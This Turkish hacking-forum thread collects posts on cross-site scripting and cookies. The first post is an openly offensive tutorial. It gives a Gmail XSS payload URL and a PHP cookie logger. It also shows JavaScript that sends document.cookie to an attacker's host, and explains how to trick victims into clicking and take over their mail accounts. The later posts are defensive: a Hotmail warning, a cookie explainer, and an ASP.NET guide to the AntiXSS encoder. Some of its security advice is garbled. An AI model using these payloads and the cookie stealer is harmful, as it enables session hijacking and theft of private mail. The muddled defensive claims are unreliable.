Mail XSS & Cookie Bilgileri

spedohymer

Katılımcı Üye
15 Eki 2007
835
15
Network / Türkiye
GMAİL XSS

S.A.

ilk önce XSS saldırısı nedir onu acıklayalım..

Cross Site Scripting olarak adlandırılır..

victim’in üye olduğu herhangi bir sitedeki hesabının, owner tarafından belirli kodlarla scriptlere gömülen saldırı türüdür.. Hackerın deneme-yanılma bir tür brutue attack yaparak bulmasıyla meydana gelir..

Hacker, başka bir scriptten, domainden veya hesaptan, XSS açığının bulunduğu siteye session bilgilerini ele geçirmesine ortam sağlar..

bu XSS (Cross Site Scripting) açığı daha çok Mail sistemlerinde karşımıza çıkar.. Bunun en büyük sebebi ise; XSS açığına günümüzdeki bir çok web uygulamalarında rastlanması ve ücretsiz güvenlik açığı tarama yazılımları ile kolayca bulunabilmesidir..


Bu bug’a en büyük çözüm ise; XSS (Cross Site Scripting) açığı bulunan scriptin yazılım kodlarının düzeltilmesidir.. Kullanılan scriptte, user’lardan alınan girdiler, mutlaka kontrol edilmelidir.. Bunun sayesinde web-mail güvenlik açıklarına sebebiyet veren; XSS (Cross Site Scripting) - SQL Injection - Buffer 0werflow gibi bug’lar rahatça fixlenebilecektir..

Örnek verecek olursak; hackerın XSS veya SQL Inj. için kullanacağımız kodlar arasında % > < ile başlayan karakterler bulunmaktadır.. Bu tür karakterlerin olduğu scriptlerde girilen verinin encode edilmesi gerekebilir.. Yani kısaca kullanılan "%" karakteri yerine v harfi uygulanırsa, böylece hacker başarısız olur..

Gelelim son olarak GOOGLE ürünü olan gmail.com servisinde XSS Açığına..

gmail.com hesabına sahip victim’i hacklemek için; kurbana vereceğim kodları yedirmeniz gerekmektedir.. Bu kodu victim’e yedirmek size kalmış tabii ki.. Herhangi bir siteye gömerekte yollayabilirsiniz, kullanılan scripte (ASP, PHP, vs) encode ederekte gömebilirsiniz veya sitenizde iframe olarak verebilirsiniz...

Kod;

http://www.google.com/reviews/w/confirm?url=http://volqan.us/root/index.php?"><SCRİPT>/XSS src= "http://sitendeki-JS-dosyanin adresi> <SCRİPT>&q=000&c=http://www.google.com/searchhl=en&q=000&btnG=Search&submit=VoLqaN">

(URL’leri kendi adresinize göre düzeltiniz)

Kurbana yedirdikten sonra gelen cerezleri, kendi cerezlerinizle editleyerek victim’in mailine giriş yapabilirsiniz..

Not: js dosya için, sniffer’ınızın olması gerekli

Kısa bir süre önce gmail hesabımı bu yolla kaptırmıstım : ) demek ki iş’e yarıyormus, neyse mühim olan "niçin hacklendim" değil "nasıl hacklendim"

GOOGLE’a ait gmail’deki bu açığın kapanması an meselesidir.. Hotmail gibi aylarca süren bir XSS açığı değil.. Bknz: En son bulunan Gmail XSS Açığı, 2 günde fixlenmişti.

Linuxmail XSS

s.a Dostlar,

Linuxmail’in güvenlik açıklarından faydalanma hakkında biraz bilgi vericem. ( Kısa Ve ÖZ )

Linuxmail.org adresinde bulunan XSS ( Cross Site Scripting ):

http://mymail.linuxmail.org/scripts/...owlist&mode=//

Kurbana Gönderilecek Linkin içindeki xss açıgımızın sonuna eklenecek kod:

kodun saglamlıgı için adres olarak veriyorum

ÖNEMLI: Arkadaslar son verdigim kodu önce decode edip düzenliyeceksiniz ve sonra tekrar encode etmeniz gerekmektedir. yoksa cookies ( çerezler ) sniffer ınıza gelmez

Kendinize göre decode ve encode yide Buradan yapabilirsiniz.

Kurbanın Cookies i çektikten sonra Operada [URL="http://www.linuxmail.org/"]http://www.linuxmail.org [url]https://tik.lat/9A28G
Simdi Buradan ne anliyoruz id numarasi yada haber numarasi diyelim 12 olan yaziyi yazdir simdi onun üzerinde az oynarsak belki xss bulabiliriz ilk önce test için java scriptteki alert komutunu test edelim nasil yapicaz http://www.hedef.com/haber.php?yazdir=**********alert("Xss");</script>
Burada eger xss yiyosa Ekranda Xss seklinde bi uyari görürüz bu nedemek olur tabiiki bu sitede java script çalistirabiliyoruz ozaman ne yapmamiz gerekli devaminda cookie çalmaya çalismaliyiz peki java scriptte cookie kodu ne
Kod:
**********alert("********.cookie");</script>
bunu sitenin sonuna söyle yazdigimizda ne olucak dersiniz http://www.hedef.com/haber.php?yazdir=**********alert(********.cookie);</script>
tabii ki deminki Xss diye uyari gördügümüz ekranda Kendi cookiemizi görücez peki baskasinin cookiesini almak için ne yapmali ilk önce bi sniffer hazirlanmali sniffer hazirlamakla ilgili döküman ileride ayrintili yazicam ama amacimiz su anda sadece isimizi su kodlar görüyoro

Kod:
<?php
$cookie = $_GET[’cookie’];
$fp = fopen(’log.php’, ’a’);
fwrite($fp, ’Cookie: ’.$cookie.’<br>’);
fclose($fp);
?>


bu kodu bi ftpye atip cal.php olarak kaydedicez Garanti olsun Chmod 777 de verelim hadi (Uha) ardindan ise java script yardimiyla diger kisilerin cookielerini çalmaya geldi onuda javadaki küçük bir oyunla halledicez
Kod:
******************.href=’ https://tik.lat/X9xFe ’%2Bescape(********.cookie)</script>

bunu sitemizin = (Esittir)’inden sonra ekliyoruz ve cookiesini çalmak istedigimiz kisinin tiklamasini sagliyoruz burasi sizin yaraticiliginiza kalmis bunu nasil yaparsiniz siz düsünün bi iki mantik göstericek olursam mesela bir web sitesi hazirlayin we tiklatmali bi sekilde yapin yani nasil tarif edeyim biri siteye girdiginde sanki o linke tiklamis gibi olsun (en basit anlatimi) yanii cokiesi olussun e tiklatma adresinede bizim kendi cookie çalma kodumuzu yazarsak elbetteki cookiemiz kendi sitemizdeki cal.php de gözükecekdir.
Cookieyi Çaldik
ee Napicaz çaldik adamin kimligini ama kendimi gizleyip içeriye nasil giricem bilmiyorum basit cookie editör veya proxomitron gibi programlar yardimiyla kolayca girebilirsiniz
Dökümanin Asil Amaci Xss ve Cookie iliskisi oldugundan dolayi fazla Detaya girmedim dicekdim de yine bayagi sey anlattigimi düsünüyorum ama önemli olan benim anlatmam degil sizin anlamaniz anladiysaniz benim için sorun yok anlamadiginiz kismi bu baslik altindan sorabilirsiniz.





[/COLOR][/B]
 

spedohymer

Katılımcı Üye
15 Eki 2007
835
15
Network / Türkiye
XSS Nedir?Nasıl Korunulur?

XSS (Cross Site Scripting - Çapraz Kod Çalıştırma) kısaca, HTML ve JavaScript yardımıyla bir sitede, siteye giren kullanıcıya tehlike arz edecek şekilde kod çalıştırmaya denir. Ziyaretçilerinizden bilgi almak amaçlı ya da onlara ait hesapları tekrar tekrar şifre girmeden kullanmaları için yollamış olduğunuz çerezleri -cookies- XSS yardımıyla çalabilirler ve kendilerini, sisteme o ziyaretçiymiş gibi gösterebilirler.

Çerezler Nasıl Çalışır?
Bir çerez, istemci -yani siz- tarafında herhangi bir bilgiyi, oturum numarasını vs. saklamaya yarayan ve sadece kendisinin yollandığı alan adı (domain) için bilgilerini veren bir araçtır denilebilir. Yani herhangi bir siteye girdiğinizde, karşı taraftan size bilgilerinizi tutmak için bir çerez yollanabilir. (Eğer tarayıcınızın güvenlik ayarları çok sıkı değilse, otomatik olarak kabul ediecektir bu çerezler )
Kullanım alanları, genel olarak kullanıcı bilgileri ya da sizin karşı taraftaki oturum numaranızı karşılaştırmak içindir. Bu noktada, karşı tarafın, sizin diğer çerezlerinizin içindeki bilgileri ele geçirmenizden şüphe edebilirsiniz belki; ancak başta da bahsettiğimiz gibi, tarayıcılar sadece çerezi isteyen yerin alan adı ve dosya yolu (örn. color=#5d5d5eUwww.*Maymunlar Cehennemi*/foo/U adresine ayarlı bir çerez, asla color=#5d5d5eUwww.*Maymunlar Cehennemi*/hodo/U adresine yollanmaz) uyuşuyorsa bu bilgileri yollarlar, olağanüstü bir durum dışında bu bir güvenlik sorununa yol açmaz

XSS Nasıl Çalışır?
Bu yazının tehlikeli işler yapmaya meyilli olan kişiler tarafından da okunma ihitmali olduğu için açık açık anlatım yoluna gitmeyi düşünmüyorum Şöyle bir gözden geçirecek olursak;
JavaScript dilinde çerezleri yönetmeyi sağlayan bir cookie yöntemi bulunmaktadır. (yani; ********.cookie) Bu yöntem yardımıyla sayfaya ait olan çerezler alınıp, okunabilir ve değiştirilebilir. [1] XSS açıklarından yararlanan kötü niyetli kişiler de, JavaScript’in bu özelliğinden yararlanarak sayfayı gezen kullanıcının çerez bilgilerini alıp, kendilerininkiyle değiştirmeye çalışırlar.

___________

Internet Dünya’sının en çok kullanılan E-Posta Servisi Hotmail’de meydana gelen ciddi bir güvenlik açığı Hacker ( Bilgisayar Korsanları)‘nın eline düştü. Hacker’lar her geçen gün kurbanlarını ele geçirmek için yeni yöntemler keşfediyorlar. İşte bunlardan bir tanesi Dünya üzerinde her ülkeden her insanın kullandığı Hotmail ‘deki XSS Güvenlik Açığı.


Bu Güvenlik açığı nasıl çalışıyor; hakkında biraz bilgi vereyim ;

Öncelikle Hacker’lar Hotmail’in XSS Kodunu Bedava (Free) bir Hosting’e yerleştiyorlar burada sizin ilginizi çekecek bir site kuruyorlar. Örneğin Öğretmensiniz ve Milli Eğitim Bakanlığının Yeni Öğretmen Atamaları Hakkındaki Genelgesi Hakkında bir bilginiz. Hacker bunu biliyor ve sizin ilginizi çekecek olan bu siteyi kuruyor. Siteyi kurarken için Hotmail’in XSS Güvenlik Açığına neden olan Kod’u yerleştiriyor ve sitenin ismini size E-mail olarak yolluyor.E-mail kutunuza gelen site link’ine tıklarsanız, Bilgisayarınızdaki Cookie(Çerez)’ler hacker’ın sitenin içine yerleştirmiş olduğu Kod sayesinde hacker’a gidiyor. Hacker daha sonra bu Cookie’lerin içinden sizin Hotmail Hesabınıza ait olan Cookileri bulup birkaç kod ekleme işlemi ile değiştirip kaydediyor. Daha sonra kendi bilgisayarından şifresiz olarak sizin E-mail’lerinizi okuyabiliyor.
Peki sadece okumakla yetiniyor mu hacker’lar ?

Tabii ki hayır! İşte sadece bir hacker’ın düşünebileceği bir kurnazlık daha gösteriyorlar burada. Hotmail Giriş bölümüne geri geliyorlar ve “ Parolamı Unuttum “ seçeneğine tıklaxxxxx sizin E-mail adresinizi giriyorlar, Şifrenizin E-Posta olarak sizin E-mail hesabına gelmesine neden oluyorlar. Daha sonra şifresiz olarak giriş yapabildikleri için giriyor ve hotmail’in göndermiş olduğu “Kayıp Parola“ İsteği mail’inin içindeki şifrenizi alıyorlar. Ve şifreyi, Gizli Sorunuzu ve ya diğer tüm bilgilerinizi tamamen ele geçirmiş oluyorlar.


Bu Güvenlik Açığından Hotmail’in Haberi Yok mu ?


Var ancak şu an için bir çözüm ya-da yama yayınlanmadı. Ülkemizde özellikle son 1 haftada bir çok kişinin E-Posta hesabı bu yöntem ile hack edildi.


Hesabınızla Neler Yapılabilir?
Ömcelikle size gelen mailler okunabilir. Tabi çoğu kişi gibi, hotmail türü emailleri sadece üye olduğunuz mail listelerinden gelen mailler için kullanıyor. Siz bu tür bir kullanım yapıyor ve bu nedenle de “önemli değil” diye düşünüyorsanız, yanılıyorsunuz. Çünkü Bilişim Polisinin ülkemizde çok yapıldığını bildirdiği ve uyardığı sibersuçlardan birisi “cep telefonu kontür” hırsızlığı.
Kontür hırsızlığı özellikle internet cafeleri kullanan askerlerin başına geliyordu ama bugünlerde bu açık nedeniyle herkesin başına gelebilir oldu. Hotmailinizi ele geçiren kiş, eğer bir adres defteriniz varsa, o defterdeki kişilere mail atarak, “kontür” ihtiyacınız olduğunu ve göndermesini rica ettiğinizi bildiriyor. Bu yollanan kontürleri de sonra satıyor. Bu yolla epeyce yolunu bulanlar olduğu yine Bilişim Polisi tarafından iletilen bir husus.

Hotmail XSS Güvenlik Açığından Korunmak İçin Neler Yapmalıyız ?

Öncelikle her güvenlik açığı potansiyel bir saldırı nedenidir. Hacker’lar her zaman hedef ve kurban bulurlar. Beni neden hedef alsınlar dediğiniz zaman bilin ki hedefin ta kendisi oldunuz. Bilgi güvenliği, Özel Hayat Güvenliği, Günümüzde oldukça önemli.
1. Tanımadığınız ya – da tanıdığınız kişilerden sizlere gelen ve içinde sadece site ismi (url) bulunuyorsa o adrese asla tıklamayınız. Tanıdığınız kişilerden de dedim çünkü hacker’lar piyasada dolaşan bir mail hacking programı sayesinde istediği E-Posta hesabindan, İstedikleri E-Posta hesabınıza E-mail gönderebiliyorlar.
2. Size gelen ve içinde site ismi (URL) bulunan E-mail’leri gönderen kişiyi teyit ettikten sonra açınız.
3. Internet üzerinde güvenliğiniz için mutlaka ama mutlakan Anti-Virüs ve Güvenlik Duvar (FireWaLL) yazılımlarının İKİSİNİ BİRDEN kullanınınız.
4. Yeniliklerden haberdar olmak ve güvenliğiniz için, Bizi Takip ediniz!
 

spedohymer

Katılımcı Üye
15 Eki 2007
835
15
Network / Türkiye
Cookie (Çerez) Nedir ?







Cookie Nedir

Cookie kelimesi "web sayfası sunucusunun sizin bilgisayarınızın hard diskine yerleştirdiği ufak bir text dosyası" için kullanılmaktadır. Yani, o web sitesinin bir sonraki ziyarette sizi tanıması için geçerli bir bilgidir bu. Bu text dosyası bir komut dosyası olmadığı gibi, virüs de değildir. Size özel bir tanımlamadır ve sadece bu kodu tanımlayan web sunucusu tarafından okunabilir.

Cookie’nin amacı; sizin o siteyi yeniden ziyaret ettiğinizi web sunucuya bildirmekten ibarettir.



Ne işe yarar?

Sizi zaman kaybından korur. Kendinize kişiselleştirdiğiniz bir sayfanız varsa ya da bir ürün ya da servis için kayıt olmuşsanız, bu cookie sizi hatırlatır. Bir sonraki dönüşünüzde, istediğiniz bilgiler ekrana gelir (mesela şifrenizin otomatik hatırlanmasını istiyorsanız, hatırlar). Aynı web sitesinden yeni bir servis için kayıt olduğunuzda da daha önce verdiğiniz cevapları otomatik olarak hatırlar. Yani web siteleri sizi bu cookie’ler yardımıyla hatırlar. Bilgileri değiştirdiğiniz takdirde ise yeni haliyel hatırlar.



Hangi Cookie’yi Kabul Eedeceğinize Nasıl karar Vereceksiniz?

Tarayıcınızdan tanımlama yaparak, hangi cookileri kabul edeceğinizi belirlersiniz. Hepsini otomatik kabul edebilir ya da cookie önerildiğinde sizi uyarmasını isteyebilirsiniz. Aşağıda bu tanımlamayı nasıl yapabileceğinizi göreceksiniz.



Internet Explorer 6.0 kullanıyorsanız







Menüden Tools / Araçlar seçeneğini tıklayın

Internet Options

Privacy / Gizlilik

Default ayar medium (orta düzey) dir. Siz seçiminizi isteiğinize göre yapın

Advanced (İleri düzey) seçerseniz, cookie bazında seçim de yapabilirsiniz.



Netscape Communicator 4.0 kullanıyorsanız







Task Bar’dan Edit seçeneğini tıklayın

Preferences

Advanced

"Cookies" yazılı kutucukta istediğiniz ayarı seçin



Kabul Ettiğiniz Cookie’leri Nasıl Görebilirsiniz?

Internet Explorer 6.0 kullanıyorsanız







Menüden Tools / Araçlar seçeneğini tıklayın

Internet Options

General / Genel bölümü altına bakın

Settings / Ayarlar seçin

Dosyaları Göster / View Files Seçeneğini tıklayın. Bilgisayarınızda kayıtlı Cookie’leri göreceksiniz.



Netscape Communicator 4.0 kullanıyorsanız

Netscape tüm cookie’leri, hard diskinizdeki tek bir dosya içinde toplar. Dosyanın ismi Cookie.txt’dir.

Cookie’nin İçindeki Kod’u Nasıl Görebilirsiniz?

Mouse’unuzu Cookie üzerine getirerek tıklayınız. Cookie’nin içinde kısa bir dizi yazı ve rakam göreceksiniz. Rakamlar sizi tanımlayan numaradır ve ancak cookie’yi veren web sunucuya bir anlam ifade eder.

 

spedohymer

Katılımcı Üye
15 Eki 2007
835
15
Network / Türkiye
Cross Site Scripting (XSS)

Kullanıcıdan alınan bilgi olduğu gibi veritabanına kaydediliyorsa ve aynı şekilde veritabanındanda istemciye gönderiliyorsa kötü niyetli kodların istemci tarafından çalıştırılması muhtemeldir.



Örneğin bir ziyaretçi defteri doldururken mesaj kısmına

********** ********.href= ‘http://www.google.com’;</script>

Gibi bir bilgi girilirse ve herhangi bir kontrol olmadan bu siteyi ziyaret eden kullanıcılara bu bilgi gönderilirse, ziyaretçiler karşılarında sizin sitenizi değil, Google’ı göreceklerdir.

Ziyaretçilerin tarayıcılarında çalıştırılan bir javascript kodu ziyaretçiniz hakkındaki Session bilgilerinin de çalınmasına sebep olabilir.

**********
********.********=’http://www.kotuniyetlisite.com/yaz.a...ocument.cookie
</script>

Şeklinde girilen bir script sitenizi ziyaret eden her kullanıcının Session bilgilerini saldırganın sitesine gönderir. Bundan sonrası saldırganın tercihne kalmış. Session bilgilerini kendine mail atabilir yada kendi veritabanına kaydebilir.

ASP.NET programcıları bu konuda diğer web geliştiricilerinden biraz daha şanslı. Çünkü, “<” ve “>” karakterleri içinde gelen bilgi “Potansiyel Tehlikeli Bilgi” olarak algılanır ve sistem hata verir.

Ancak günümüz de sık geliştirilen “İçerik Yönetim Sistem” leri “FCK Editor” gibi html kodu üreten WYSWYG* editörleri kullanmakta.

Bu da ASP.NET programcısının “Fck Editor” kullandığı sayfasının başına ValidateRequest="false" gibi bir kodu eklemesine sebep veriyor. Bu da XSS saldırıları için bir davet anlamına gelir.

Buraya kadar verdiğimiz örnekler HTML kodları arasına sızan tekniklerdi.

Kullanıcıdan alınan bilgi ile oluşturulabilecek JavaScript, VBScript, XML de bu tehlikelere maruz kalabilir.

Javascript için basit bir örnek verelim.

Default.aspx dosyamızda bulunan Javascript :

<script type="text/javascript" >
alert(’Merhaba’ + ‘<asp:Literal runat="server" id="ltAd" />’);
</script>


Default.aspx.cs dosyasından gönderilen bilgi :

ltAd.Text = "Selçuk";

Sayfa çalıştırıldığında “Merhaba Selçuk” şeklinde bir MessageBox çıkıyor.

“Selçuk” değerinin veritabanından geldiğini farzedelim. Eğer veritabanından gelen şöyle bir şey olursa :

ltAd.Text = " ’ ********.href= "http://www.google.com’; alert(’a";

Sayfamız derlendiğinde ortaya çıkan Javascript kodunu inceleyelim :

<script type="text/javascript" >
alert(’Merhaba ’); ********.href=’http://www.google.com’; alert(’a’);
</script>


Ziyaretçi “Merhaba” şeklinde bir MessageBox görür ve kendini yine Google da bulur.

Bu konuda örnekler çoğaltılabilir. Biz şimdi alacağımız önlemlere geçelim.

Bunun için “Microsoft Anti-Cross Site Scripting Library” kütüphanesini kullanacağız.

http://www.microsoft.com/downloads/d...displaylang=en adresinden temin edebileceğiniz AntiXSSLibrary.dll i projemize dahil ediyoruz.

Microsoft.Application.Security.AntiXSS namespace’inden ulaşabileceğimiz 7 adet static metot ile XSS saldırıların önüne geçebiliriz.

Bu metotlar :


HtmlEncode
HtmlAttributeEncode
JavaScriptEncode
UrlEncode
VisualBasicScriptEncode
XmlEncode
XmlAttributeEncode

Yukarıda verdiğimiz örneklerden Javascript için

ltAd.Text = "’); ********.href= "http://www.google.com’; alert(’a");

yerine

using Microsoft.Security.Application.AntiXss;

...

ltAd.Text =
JavaScriptEncode("’); ********.href= "http://www.google.com’; alert(’a");

Şeklinde kullandığımızda bir ziyaretçilerimiz bir zarar görmeyecektir.

Sayfamızı derledikten sonra oluşan Javascript kodumuzu inceleyelim :

<script type="text/javascript" >
alert(’Merhaba ’\\x27\\x29\\x3b
********.href\\x3d\\x27http\\x3a\\x2f\\x2fwww.goog le.com\\x27\\x3b
alert\\x28\\x27a’);
</script>

Görüldüğü gibi “)“ işareti \\x27 ye , “;” işareti \\x29 a ve diğer zararlı karakterlerde Javascript’in karşılıklarına çevrilmiş. Bu kodlar çalıştırılamaz ama aynı karaktersel değerleini korurlar.

Örneğin

ltAd.Text = Microsoft.Security.Application.AntiXss.JavaScriptE ncode("Selçuk");Şeklinde bir kullanımda ekranda “Selçuk” yazar ancak kaynak kodunda “ç” karakteri \\u00e7 olarak kodlanmıştır.



Bunun sebebi ise AntiXSS kütüphanesinin belli başlı karakterleri encode eder. Bunlar büyüktür “<” , küçüktür “>” , ampersand “&” , çift tırnak “"” ve ascii değeri 160-255 arası olan karakterlerdir.

“ç” harfi ascii tablosunda bulunmuyor ancak unicode değer olan 351’in Hexadecimal eşiti 00e7 dir. Dolayısıyla Javascript’tin ç harfini \\u00e7 olarak tanır.

Gercek Turk Hackerlarız bız Türk hacker olmak istiyorsanız veya bılısım korsanı olmak ıstıyorsanız

sitemizi gelin

GrayhatZ / Hack Forum

GrayhatZ / Hack Forum - hack sitesi, hacksitesi, grayhatz, grayhats, grayhat, msn hack, pc hack, msn patlatma, msn kırma, msn şifre, msn şifre kırma, hack platformu, hack forumu, hack formu, hacker, hacker sitesi, hacked
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.